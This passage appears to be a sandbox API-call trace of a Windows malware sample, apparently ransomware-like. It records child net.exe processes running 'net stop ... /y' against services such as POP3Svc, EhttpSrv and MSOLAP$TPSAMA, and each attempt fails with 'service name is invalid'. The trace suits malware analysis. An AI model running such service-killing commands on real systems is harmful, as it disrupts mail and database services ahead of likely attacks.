_String2="EhttpSrv") returned 9 [0199.708] _wcsupr (in: _String="EhttpSrv" | out: _String="EHTTPSRV") returned="EHTTPSRV" [0199.708] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4f54b8 [0199.711] GetServiceKeyNameW (in: hSCManager=0x4f54b8, lpDisplayName="EHTTPSRV", lpServiceName=0x14aaf0, lpcchBuffer=0xff800 | out: lpServiceName="", lpcchBuffer=0xff800) returned 0 [0199.711] _wcsicmp (_String1="msg", _String2="EHTTPSRV") returned 8 [0199.711] _wcsicmp (_String1="messenger", _String2="EHTTPSRV") returned 8 [0199.711] _wcsicmp (_String1="receiver", _String2="EHTTPSRV") returned 13 [0199.711] _wcsicmp (_String1="rcv", _String2="EHTTPSRV") returned 13 [0199.711] _wcsicmp (_String1="redirector", _String2="EHTTPSRV") returned 13 [0199.711] _wcsicmp (_String1="redir", _String2="EHTTPSRV") returned 13 [0199.712] _wcsicmp (_String1="rdr", _String2="EHTTPSRV") returned 13 [0199.712] _wcsicmp (_String1="workstation", _String2="EHTTPSRV") returned 18 [0199.712] _wcsicmp (_String1="work", _String2="EHTTPSRV") returned 18 [0199.712] _wcsicmp (_String1="wksta", _String2="EHTTPSRV") returned 18 [0199.712] _wcsicmp (_String1="prdr", _String2="EHTTPSRV") returned 11 [0199.712] _wcsicmp (_String1="devrdr", _String2="EHTTPSRV") returned -1 [0199.712] _wcsicmp (_String1="lanmanworkstation", _String2="EHTTPSRV") returned 7 [0199.712] _wcsicmp (_String1="server", _String2="EHTTPSRV") returned 14 [0199.712] _wcsicmp (_String1="svr", _String2="EHTTPSRV") returned 14 [0199.712] _wcsicmp (_String1="srv", _String2="EHTTPSRV") returned 14 [0199.712] _wcsicmp (_String1="lanmanserver", _String2="EHTTPSRV") returned 7 [0199.712] _wcsicmp (_String1="alerter", _String2="EHTTPSRV") returned -4 [0199.712] _wcsicmp (_String1="netlogon", _String2="EHTTPSRV") returned 9 [0199.712] NetServiceControl (in: servername=0x0, service="EHTTPSRV", opcode=0x0, arg=0x0, bufptr=0xff7fc | out: bufptr=0xff7fc) returned 0x889 [0199.713] wcscpy_s (in: _Destination=0x14a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0199.713] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0199.713] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x14b338, nSize=0x800, Arguments=0x149dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0199.715] GetFileType (hFile=0x26c) returned 0x3 [0199.715] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4f3fe8 [0199.715] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4f3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0199.715] WriteFile (in: hFile=0x26c, lpBuffer=0x4f3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xff73c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xff73c, lpOverlapped=0x0) returned 0 [0199.715] LocalFree (hMem=0x4f3fe8) returned 0x0 [0199.715] GetFileType (hFile=0x26c) returned 0x3 [0199.715] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4f6290 [0199.715] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nO", lpUsedDefaultChar=0x0) returned 2 [0199.715] WriteFile (in: hFile=0x26c, lpBuffer=0x4f6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xff73c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xff73c, lpOverlapped=0x0) returned 0 [0199.715] LocalFree (hMem=0x4f6290) returned 0x0 [0199.715] _ultow (in: _Dest=0x889, _Radix=1046380 | out: _Dest=0x889) returned="2185" [0199.715] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x14b338, nSize=0x800, Arguments=0x149dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0199.715] GetFileType (hFile=0x26c) returned 0x3 [0199.715] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4f6290 [0199.715] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4f6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0199.715] WriteFile (in: hFile=0x26c, lpBuffer=0x4f6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xff748, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xff748, lpOverlapped=0x0) returned 0 [0199.715] LocalFree (hMem=0x4f6290) returned 0x0 [0199.715] GetFileType (hFile=0x26c) returned 0x3 [0199.715] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4f6290 [0199.716] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4f6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nO", lpUsedDefaultChar=0x0) returned 2 [0199.716] WriteFile (in: hFile=0x26c, lpBuffer=0x4f6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xff748, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xff748, lpOverlapped=0x0) returned 0 [0199.716] LocalFree (hMem=0x4f6290) returned 0x0 [0199.716] NetApiBufferFree (Buffer=0x4f1c60) returned 0x0 [0199.716] NetApiBufferFree (Buffer=0x4f1c78) returned 0x0 [0199.716] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EhttpSrv /y" [0199.716] exit (_Code=2) Process: id = "160" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x11f54000" os_pid = "0x4fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop POP3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 333 os_tid = 0x444 Process: id = "161" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4ff68000" os_pid = "0x228" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "160" os_parent_pid = "0x4fc" cmd_line = "C:\\Windows\\system32\\net1 stop POP3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 334 os_tid = 0x2a8 [0199.847] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23f868 | out: lpSystemTimeAsFileTime=0x23f868*(dwLowDateTime=0x404eb7e0, dwHighDateTime=0x1d57a87)) [0199.847] GetCurrentProcessId () returned 0x228 [0199.847] GetCurrentThreadId () returned 0x2a8 [0199.847] GetTickCount () returned 0x116b9be [0199.847] QueryPerformanceCounter (in: lpPerformanceCount=0x23f860 | out: lpPerformanceCount=0x23f860*=32013160096) returned 1 [0199.847] GetModuleHandleA (lpModuleName=0x0) returned 0xbe0000 [0199.847] __set_app_type (_Type=0x1) [0199.847] __p__fmode () returned 0x74eb31f4 [0199.847] __p__commode () returned 0x74eb31fc [0199.847] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xbeffe6) returned 0x0 [0199.848] __getmainargs (in: _Argc=0xbf9064, _Argv=0xbf906c, _Env=0xbf9068, _DoWildCard=0, _StartInfo=0xbf9024 | out: _Argc=0xbf9064, _Argv=0xbf906c, _Env=0xbf9068) returned 0 [0199.848] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0199.848] GetConsoleOutputCP () returned 0x1b5 [0199.848] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xbf9080 | out: lpCPInfo=0xbf9080) returned 1 [0199.848] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.851] sprintf_s (in: _DstBuf=0x23f820, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0199.851] setlocale (category=0, locale=".437") returned="English_United States.437" [0199.853] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0199.853] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0199.853] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop POP3Svc /y" [0199.853] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x23f5ec, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0199.853] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x62) returned 0x453c00 [0199.853] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0199.853] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23f7f0 | out: Buffer=0x23f7f0*=0x451c60) returned 0x0 [0199.853] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x23f7f0 | out: Buffer=0x23f7f0*=0x451c78) returned 0x0 [0199.853] _fileno (_File=0x74eb2900) returned -2 [0199.853] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0199.853] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0199.853] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0199.853] _wcsicmp (_String1="config", _String2="stop") returned -16 [0199.853] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0199.853] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0199.854] _wcsicmp (_String1="file", _String2="stop") returned -13 [0199.854] _wcsicmp (_String1="files", _String2="stop") returned -13 [0199.854] _wcsicmp (_String1="group", _String2="stop") returned -12 [0199.854] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0199.854] _wcsicmp (_String1="help", _String2="stop") returned -11 [0199.854] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0199.854] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0199.854] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0199.854] _wcsicmp (_String1="session", _String2="stop") returned -15 [0199.854] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0199.854] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0199.854] _wcsicmp (_String1="share", _String2="stop") returned -12 [0199.854] _wcsicmp (_String1="start", _String2="stop") returned -14 [0199.854] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0199.854] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0199.854] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0199.854] _wcsicmp (_String1="accounts", _String2="POP3Svc") returned -15 [0199.854] _wcsicmp (_String1="computer", _String2="POP3Svc") returned -13 [0199.854] _wcsicmp (_String1="config", _String2="POP3Svc") returned -13 [0199.854] _wcsicmp (_String1="continue", _String2="POP3Svc") returned -13 [0199.854] _wcsicmp (_String1="cont", _String2="POP3Svc") returned -13 [0199.854] _wcsicmp (_String1="file", _String2="POP3Svc") returned -10 [0199.854] _wcsicmp (_String1="files", _String2="POP3Svc") returned -10 [0199.854] _wcsicmp (_String1="group", _String2="POP3Svc") returned -9 [0199.854] _wcsicmp (_String1="groups", _String2="POP3Svc") returned -9 [0199.854] _wcsicmp (_String1="help", _String2="POP3Svc") returned -8 [0199.854] _wcsicmp (_String1="helpmsg", _String2="POP3Svc") returned -8 [0199.854] _wcsicmp (_String1="localgroup", _String2="POP3Svc") returned -4 [0199.854] _wcsicmp (_String1="pause", _String2="POP3Svc") returned -14 [0199.854] _wcsicmp (_String1="session", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="sessions", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="sess", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="share", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="start", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="stats", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="statistics", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="stop", _String2="POP3Svc") returned 3 [0199.854] _wcsicmp (_String1="time", _String2="POP3Svc") returned 4 [0199.855] _wcsicmp (_String1="user", _String2="POP3Svc") returned 5 [0199.855] _wcsicmp (_String1="users", _String2="POP3Svc") returned 5 [0199.855] _wcsicmp (_String1="msg", _String2="POP3Svc") returned -3 [0199.855] _wcsicmp (_String1="messenger", _String2="POP3Svc") returned -3 [0199.855] _wcsicmp (_String1="receiver", _String2="POP3Svc") returned 2 [0199.855] _wcsicmp (_String1="rcv", _String2="POP3Svc") returned 2 [0199.855] _wcsicmp (_String1="netpopup", _String2="POP3Svc") returned -2 [0199.855] _wcsicmp (_String1="redirector", _String2="POP3Svc") returned 2 [0199.855] _wcsicmp (_String1="redir", _String2="POP3Svc") returned 2 [0199.855] _wcsicmp (_String1="rdr", _String2="POP3Svc") returned 2 [0199.855] _wcsicmp (_String1="workstation", _String2="POP3Svc") returned 7 [0199.855] _wcsicmp (_String1="work", _String2="POP3Svc") returned 7 [0199.855] _wcsicmp (_String1="wksta", _String2="POP3Svc") returned 7 [0199.855] _wcsicmp (_String1="prdr", _String2="POP3Svc") returned 3 [0199.855] _wcsicmp (_String1="devrdr", _String2="POP3Svc") returned -12 [0199.855] _wcsicmp (_String1="lanmanworkstation", _String2="POP3Svc") returned -4 [0199.855] _wcsicmp (_String1="server", _String2="POP3Svc") returned 3 [0199.855] _wcsicmp (_String1="svr", _String2="POP3Svc") returned 3 [0199.855] _wcsicmp (_String1="srv", _String2="POP3Svc") returned 3 [0199.855] _wcsicmp (_String1="lanmanserver", _String2="POP3Svc") returned -4 [0199.855] _wcsicmp (_String1="alerter", _String2="POP3Svc") returned -15 [0199.855] _wcsicmp (_String1="netlogon", _String2="POP3Svc") returned -2 [0199.855] _wcsupr (in: _String="POP3Svc" | out: _String="POP3SVC") returned="POP3SVC" [0199.855] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4554b8 [0199.858] GetServiceKeyNameW (in: hSCManager=0x4554b8, lpDisplayName="POP3SVC", lpServiceName=0xbfaaf0, lpcchBuffer=0x23f78c | out: lpServiceName="", lpcchBuffer=0x23f78c) returned 0 [0199.858] _wcsicmp (_String1="msg", _String2="POP3SVC") returned -3 [0199.858] _wcsicmp (_String1="messenger", _String2="POP3SVC") returned -3 [0199.858] _wcsicmp (_String1="receiver", _String2="POP3SVC") returned 2 [0199.858] _wcsicmp (_String1="rcv", _String2="POP3SVC") returned 2 [0199.858] _wcsicmp (_String1="redirector", _String2="POP3SVC") returned 2 [0199.858] _wcsicmp (_String1="redir", _String2="POP3SVC") returned 2 [0199.858] _wcsicmp (_String1="rdr", _String2="POP3SVC") returned 2 [0199.859] _wcsicmp (_String1="workstation", _String2="POP3SVC") returned 7 [0199.859] _wcsicmp (_String1="work", _String2="POP3SVC") returned 7 [0199.859] _wcsicmp (_String1="wksta", _String2="POP3SVC") returned 7 [0199.859] _wcsicmp (_String1="prdr", _String2="POP3SVC") returned 3 [0199.859] _wcsicmp (_String1="devrdr", _String2="POP3SVC") returned -12 [0199.859] _wcsicmp (_String1="lanmanworkstation", _String2="POP3SVC") returned -4 [0199.859] _wcsicmp (_String1="server", _String2="POP3SVC") returned 3 [0199.859] _wcsicmp (_String1="svr", _String2="POP3SVC") returned 3 [0199.859] _wcsicmp (_String1="srv", _String2="POP3SVC") returned 3 [0199.859] _wcsicmp (_String1="lanmanserver", _String2="POP3SVC") returned -4 [0199.859] _wcsicmp (_String1="alerter", _String2="POP3SVC") returned -15 [0199.859] _wcsicmp (_String1="netlogon", _String2="POP3SVC") returned -2 [0199.859] NetServiceControl (in: servername=0x0, service="POP3SVC", opcode=0x0, arg=0x0, bufptr=0x23f788 | out: bufptr=0x23f788) returned 0x889 [0199.860] wcscpy_s (in: _Destination=0xbfa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0199.860] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0199.860] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xbfb338, nSize=0x800, Arguments=0xbf9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0199.861] GetFileType (hFile=0x26c) returned 0x3 [0199.861] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x453fe8 [0199.861] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x453fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0199.862] WriteFile (in: hFile=0x26c, lpBuffer=0x453fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x23f6c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f6c8, lpOverlapped=0x0) returned 0 [0199.862] LocalFree (hMem=0x453fe8) returned 0x0 [0199.862] GetFileType (hFile=0x26c) returned 0x3 [0199.862] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x456290 [0199.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x456290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nE", lpUsedDefaultChar=0x0) returned 2 [0199.862] WriteFile (in: hFile=0x26c, lpBuffer=0x456290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23f6c8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f6c8, lpOverlapped=0x0) returned 0 [0199.862] LocalFree (hMem=0x456290) returned 0x0 [0199.862] _ultow (in: _Dest=0x889, _Radix=2356984 | out: _Dest=0x889) returned="2185" [0199.862] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xbfb338, nSize=0x800, Arguments=0xbf9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0199.862] GetFileType (hFile=0x26c) returned 0x3 [0199.862] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x456290 [0199.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x456290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0199.862] WriteFile (in: hFile=0x26c, lpBuffer=0x456290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x23f6d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f6d4, lpOverlapped=0x0) returned 0 [0199.862] LocalFree (hMem=0x456290) returned 0x0 [0199.862] GetFileType (hFile=0x26c) returned 0x3 [0199.862] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x456290 [0199.862] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x456290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nE", lpUsedDefaultChar=0x0) returned 2 [0199.862] WriteFile (in: hFile=0x26c, lpBuffer=0x456290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x23f6d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x23f6d4, lpOverlapped=0x0) returned 0 [0199.862] LocalFree (hMem=0x456290) returned 0x0 [0199.863] NetApiBufferFree (Buffer=0x451c60) returned 0x0 [0199.863] NetApiBufferFree (Buffer=0x451c78) returned 0x0 [0199.863] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop POP3Svc /y" [0199.863] exit (_Code=2) Process: id = "162" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1cf59000" os_pid = "0x790" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSOLAP$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 335 os_tid = 0xa7c Process: id = "163" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6e7d1000" os_pid = "0x230" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "162" os_parent_pid = "0x790" cmd_line = "C:\\Windows\\system32\\net1 stop MSOLAP$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 336 os_tid = 0x798 [0200.004] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cff70 | out: lpSystemTimeAsFileTime=0x2cff70*(dwLowDateTime=0x406685a0, dwHighDateTime=0x1d57a87)) [0200.005] GetCurrentProcessId () returned 0x230 [0200.005] GetCurrentThreadId () returned 0x798 [0200.005] GetTickCount () returned 0x116ba5a [0200.005] QueryPerformanceCounter (in: lpPerformanceCount=0x2cff68 | out: lpPerformanceCount=0x2cff68*=32028926899) returned 1 [0200.005] GetModuleHandleA (lpModuleName=0x0) returned 0xf00000 [0200.005] __set_app_type (_Type=0x1) [0200.005] __p__fmode () returned 0x74eb31f4 [0200.005] __p__commode () returned 0x74eb31fc [0200.005] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf0ffe6) returned 0x0 [0200.005] __getmainargs (in: _Argc=0xf19064, _Argv=0xf1906c, _Env=0xf19068, _DoWildCard=0, _StartInfo=0xf19024 | out: _Argc=0xf19064, _Argv=0xf1906c, _Env=0xf19068) returned 0 [0200.005] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0200.005] GetConsoleOutputCP () returned 0x1b5 [0200.006] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf19080 | out: lpCPInfo=0xf19080) returned 1 [0200.006] SetThreadUILanguage (LangId=0x0) returned 0x409 [0200.009] sprintf_s (in: _DstBuf=0x2cff28, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0200.009] setlocale (category=0, locale=".437") returned="English_United States.437" [0200.011] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0200.011] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0200.011] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSOLAP$TPSAMA /y" [0200.011] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cfcf4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0200.011] RtlAllocateHeap (HeapHandle=0x3b0000, Flags=0x0, Size=0x6e) returned 0x3c3c10 [0200.011] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0200.011] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfef8 | out: Buffer=0x2cfef8*=0x3c1c70) returned 0x0 [0200.011] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2cfef8 | out: Buffer=0x2cfef8*=0x3c1c88) returned 0x0 [0200.011] _fileno (_File=0x74eb2900) returned -2 [0200.012] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0200.012] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0200.012] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0200.012] _wcsicmp (_String1="config", _String2="stop") returned -16 [0200.012] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0200.012] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0200.012] _wcsicmp (_String1="file", _String2="stop") returned -13 [0200.012] _wcsicmp (_String1="files", _String2="stop") returned -13 [0200.012] _wcsicmp (_String1="group", _String2="stop") returned -12 [0200.012] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0200.012] _wcsicmp (_String1="help", _String2="stop") returned -11 [0200.012] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0200.012] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0200.012] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0200.012] _wcsicmp (_String1="session", _String2="stop") returned -15 [0200.012] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0200.012] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0200.012] _wcsicmp (_String1="share", _String2="stop") returned -12 [0200.012] _wcsicmp (_String1="start", _String2="stop") returned -14 [0200.012] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0200.012] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0200.012] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0200.012] _wcsicmp (_String1="accounts", _String2="MSOLAP$TPSAMA") returned -12 [0200.012] _wcsicmp (_String1="computer", _String2="MSOLAP$TPSAMA") returned -10 [0200.012] _wcsicmp (_String1="config", _String2="MSOLAP$TPSAMA") returned -10 [0200.012] _wcsicmp (_String1="continue", _String2="MSOLAP$TPSAMA") returned -10 [0200.012] _wcsicmp (_String1="cont", _String2="MSOLAP$TPSAMA") returned -10 [0200.012] _wcsicmp (_String1="file", _String2="MSOLAP$TPSAMA") returned -7 [0200.012] _wcsicmp (_String1="files", _String2="MSOLAP$TPSAMA") returned -7 [0200.012] _wcsicmp (_String1="group", _String2="MSOLAP$TPSAMA") returned -6 [0200.012] _wcsicmp (_String1="groups", _String2="MSOLAP$TPSAMA") returned -6 [0200.012] _wcsicmp (_String1="help", _String2="MSOLAP$TPSAMA") returned -5 [0200.012] _wcsicmp (_String1="helpmsg", _String2="MSOLAP$TPSAMA") returned -5 [0200.012] _wcsicmp (_String1="localgroup", _String2="MSOLAP$TPSAMA") returned -1 [0200.012] _wcsicmp (_String1="pause", _String2="MSOLAP$TPSAMA") returned 3 [0200.013] _wcsicmp (_String1="session", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="sessions", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="sess", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="share", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="start", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="stats", _String2="MSOLAP$TPSAMA") returned 6 [0200.013] _wcsicmp (_String1="statistics", 